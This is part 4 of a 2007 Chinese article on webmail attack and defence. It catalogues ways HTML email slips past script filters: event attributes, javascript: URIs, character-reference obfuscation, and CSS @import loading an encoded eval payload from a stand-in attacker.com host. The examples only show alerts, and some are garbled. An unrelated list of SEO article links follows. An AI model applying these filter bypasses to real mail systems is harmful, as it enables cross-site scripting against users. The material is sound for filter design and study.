Webmail攻防实战(4)
来源:云南设计港 发布时间:2007-10-26 13:38:00
鉴于脚本程序可能带来的危险,WebMail系统完全有必要禁止html邮件中的脚本程序。禁止脚本程序的基本做法就是过滤掉html源程序中能够使脚本程序运行的代码,如script元素等,在这方面做的最好的莫过于hotmail了。下面是些常见的绕过脚本程序过滤的方法,不少的WebMail系统仍然没有完全改正:
(1)在html语言里,除了script元素内的或在script元素内引入的脚本程序能在html页面装载时被运行外,使用事件属性也能调用脚本程序运行,事件属性在JavaScript语言里被称为事件句柄,用于对页面上的某个特定事件(如鼠标点击、表单提交)做出响应,驱动javascript程序运行。它的语法如下:
<tagattribute1attribute2onEventName="javascriptcode;">
例如:
<bodyonload="alert('JavaScript#1isexecuted');">
<ahref="#"onclick="alert('JavaScript#2isexecuted');">Clickhere</a>
<formmethod="post"action="#"onsubmit="alert('JavaScript#3isexecuted');">
<inputtype="submit"value="Submit">
</form>
</body>
(2)URI(UniversalResourceIdentifier:通用资源标识)用于定位Internet上每种可用的资源,如HTML文档、图像、声音等。浏览器根据URI的资源类型(URIscheme)调用相应的程序操作该资源,如果把一些元素的URI属性值的资源类型设为javascript,则能够调用javascript程序运行。语法如下,注意要用“;”分隔不同的javascript语句:
<tagattribute="javascript:javascript-code;">
例如:
<bodybackground="javascript:alert('JavaScript#1isexecuted');">
<ahref="javascript:alert('JavaScript#2isexecuted');">Clickhere</a>
<formmethod="post"action="javascript:alert('JavaScript#3isexecuted');">
<inputtype="submit"value="Submit">
</form>
<imgsrc="javascript:alert('JavaScript#4isexecuted');">
</body>
(3)由于软硬件或其他原因,一些冷僻或特殊的字符不能输入或正确显示在html页面上,为了解决这个问题,html中可以使用SGML字符参考。字符参考是一种用来指定文档字符集中任何字符的独立编码机制,以“&”开始,以“;”结束。字符参考有两种表达方式:数字字符参考和实体字符参考。数字字符参考的语法为“&#D;”(D代表一个十进制数),或“&#xH;”、“&#XH;”(H代表一个十六进制数),例如“A;”、“A;”表示字母“A”,“水;”、“水;”表示汉字“水”。
攻击者把html语句里的一些字符以数字字符参考来代替,这样能避开WebMail系统对脚本程序的过滤。需要注意的是,元素和属性不可以用字符参考表示,例如:
<body>
<imglowsrc="ja;vasC;ript:alert('JavaScript#1isexecuted')">
<ahref="j;avA;sC;ript:;aler;t('JavaScript#2
i;ܾxecuted')">Clickhere;</a>
<formmethod="post"action="javascript:alert('JavaScript#3is
executed')">
<inputtype="S;ubmit"value="Submit">
</form>
</body>
(4)样式表是层叠样式表单(CSS:CascadingStyleSheet)的简称,用于控制、增强或统一网页上的样式(如字体、颜色等),它能够将样式信息与网页内容相分离,在html语言的style标签内可以用@import声明输入一个样式表。但是,如果输入的资源类型或内容是javascript,InternetExplorer浏览器仍然会执行。
例如:<styletype="text/css">
<!--
@importurl(javascript:alert('JavaScript#1isexecuted'));
@importurl(http://www.attacker.com/js.css);
-->
</style>
其中http://www.attacker.com/js.css的内容如下所示:
@importurl(javascript:alert('JavaScript#2isexecuted'));
@importurl(javascript:eval(String.fromCharCode
(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,
108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)));
能够绕过WebMail系统对脚本程序过滤的方法远不止上面所说的这些,例如曾有人发现把“<script>”标签改成“<_a<script>”和“<<script>”的样子能绕过yahoo电邮的过滤,这个漏洞yahoo在最近才改正过来。
0
投稿猜你喜欢
- 然而,当你觉得你已经把做能写作的话题全部都用尽的时候,再写出有利于SEO的文章对你来说就成了一件困难的事情。下面我将向你介绍5个小窍门,也许
- 今天和妈妈、大福一起去逛街,5小时。大福买了粉色的T恤,我买了粉色的凉鞋,妈妈买了粉色的套装。我们还买了很多吃的,每个人都知道另外的人喜欢吃
- 什么是首页降权?它和GOOGLE的沙盒效应是同一个概念的吗?在看这篇文章时,我们必须要搞清楚这个概念。GOOLE沙盒效应即Sandbox效应
2)连接命令设置:前面介绍的是从根本上彻底解决windows 2000 server和windows 2003非人性化问题,将我们的系统设置- seo新手也许会误解,也许是静态化好理解,现在很多新手,对一个网站进行优化诊断,第一个步骤就是不管三七二十一,建议客户进行页面静态化。页面由
- LAMP框架是当前软件开发的一种重要模式,LAMP中的L代表开源的操作系统Linux,A代表最著名的WWW服务器,也是开源软件的Apache
- 一个网站的制作过程,通常需要经历5个阶段,他们依次是网站需求调查阶段、网站技术分析阶段、网站页面策划阶段、网站设计阶段和网站改进阶段。将每一
- 本人作站也有段不少的时间了。今天闲来无事说一下我的做站优化思路吧。其中也许会有些地方是错误的,请高手给扶正一下。经过近一年时间来对GOOGL
- 经常有网友向水煮鱼表示希望学习搜索引擎优化 SEO 的知识,询问搜索引擎优化 SEO 的书籍哪本最好,水煮鱼一般向他们推荐 Zac 的《网络
- 康盛创想(Comsenz)推出的UCenter Home强调只提供用户愿意关注的信息,在信息噪音方面有着多级筛选控制。每一个人都可以将自己的
- com国际域名从到期到掉下来时间为:30+30+5=65天域名到期后13天内仍可以正常解析和管理,并可以在线续费,续费价格与注册域名价格相同
- 经常看到有人在论坛里问URL的绝对路径和相对路径问题,在网站中应该使用哪种?对SEO有什么影响?这实际上没有绝对的答案,两者各有优缺点。Go
- 用Linux主机的网站可以通过.htaccess做301跳转,这个大家都很清楚。如果能对.htaccess的规则非常了解的话,那么使用起来肯
- “淘宝客”是指帮助淘宝卖家推广商品赚取佣金的人(之前叫淘客)。只要获取淘宝商品的推广链接,让买家通过您的推广链接进入淘宝店铺购买商品并确认付
- 中新网10月10日电 今天上午,卫生部疾病预防控制局副局长孔灵芝表示,关于网瘾诊断标准的问题,我国现在正在研究之中,没有把它作为精神障碍的特
- 接到这个项目时我看了他们的网站,基本上没有做SEO,搜索引擎优化也没有做,我查了一个百度,谷歌都没有收录他们的网站.接到这个项目时已经是年底
- 最近又开始玩PHP,研究起dedecms...这不正想搞搞导航站,想试试用dedecms这个内容管理系统实现其功能,终于早上配置好了php平
- 新浪科技讯 北京时间6月24日消息,据国外媒体报道,谷歌周一宣布,将向广告主提供一款名为AdPlanner的免费Web评估工具,以帮助他们定
- 有了这些理论的基础就可以分析一下ajax的具体实现了,下面就以注册过程中的检查用户名在数据库是不是存在并给用户提示这样一个ajax过程进行全
- 微软将会在纽约举办Office 2010和SharePoint 2010服务器产品的发布会。不过,微软此次仅仅是面向企业用户发布Office
